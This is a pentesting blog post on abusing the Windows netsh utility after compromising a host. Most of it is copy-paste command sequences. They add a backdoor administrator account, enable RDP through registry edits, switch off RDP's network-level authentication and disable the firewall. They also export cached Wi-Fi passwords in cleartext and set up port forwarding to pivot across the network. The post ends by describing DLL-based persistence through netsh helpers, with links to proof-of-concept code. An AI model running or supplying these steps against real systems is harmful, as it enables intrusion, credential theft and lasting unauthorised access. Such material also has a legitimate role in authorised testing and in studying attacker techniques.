Back to Posts

Netshell

Posted in Pentesting

Netshell in a Nutshell

A versatile built-in Windows network utility native to Windows 7 and above. If you’ve compromised a windows target and don’t have a fancy meterpreter shell, netsh will be a useful tool to enumerate, escalate or pivot. You can set firewall rules, open ports, check cached wifi credentials, configure port forwarding and much more.

Once you’ve gotten shell on a windows target you can start off by checking firewall info..

C:\>netsh
netsh>firewall show state

Depending on privileges and how loud you want to be, you can configure RDP for any post-exploitation tasks.

Add new user, open remote desktop and add to group..

C:\>net user creosote pass123 /add
C:\>net localgroup administrators creosote /add
C:\>netsh firewall set service type = remotedesktop mode = enable
C:\>net localgroup "Remote Desktop Users" creosote /ADD

If you’re having issues opening remote desktop with the above try this…

C:\>reg add "hklm\system\currentControlSet\Control\Terminal Server"
 /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

C:\>reg add "hklm\system\currentControlSet\Control\Terminal Server"
 /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

C:\>sc config TermService start= auto

C:\>netsh firewall add portopening TCP 3389 "Remote Desktop"


#If you get a CredSSP error try this…
C:\>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal 
Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f


You can always disable the firewall if needed…

netsh>firewall set opmode mode=disable

If you’re conducting forensics or just enuming and want to check wireless info (hosted networks, wireless profiles, etc)…

netsh>wlan show all

It’s also possible to grab cached wireless creds…

netsh>wlan export profile key=clear

Add port forwarding and pivot to other machines on the network…

netsh> interface portproxy add v4tov4 listenport=LPORT 
listenaddress=0.0.0.0 connectport=RPORT connectaddress=RHOST


Exploit netsh.exe

According to: https://attack.mitre.org/wiki/Technique/T1128 it’s also possible to maintain persistence through injecting a malicious DLL into the netsh helper DLL registry path. Netsh helper DLL’s extend the functionality of the netsh utility, and can be loaded when netsh is started.

Out of curiosity I dove into this a little more and created a working POC with write-up here: http://liberty-shell.com/sec/2018/07/28/netshlep/

Various installed applications (like VPN) may run netsh by default. The attacker may also set netsh to execute on startup, triggering the malicious DLL – creating a route for persistence.

A PoC can also be found here: https://github.com/outflanknl/NetshHelperBeacon

¦̵̱ ̵̱ ̵̱ ̵̱ ̵̱(̢ ̡͇̅└͇̅┘͇̅ (▤8כ−◦

Read Next

LFI & RFI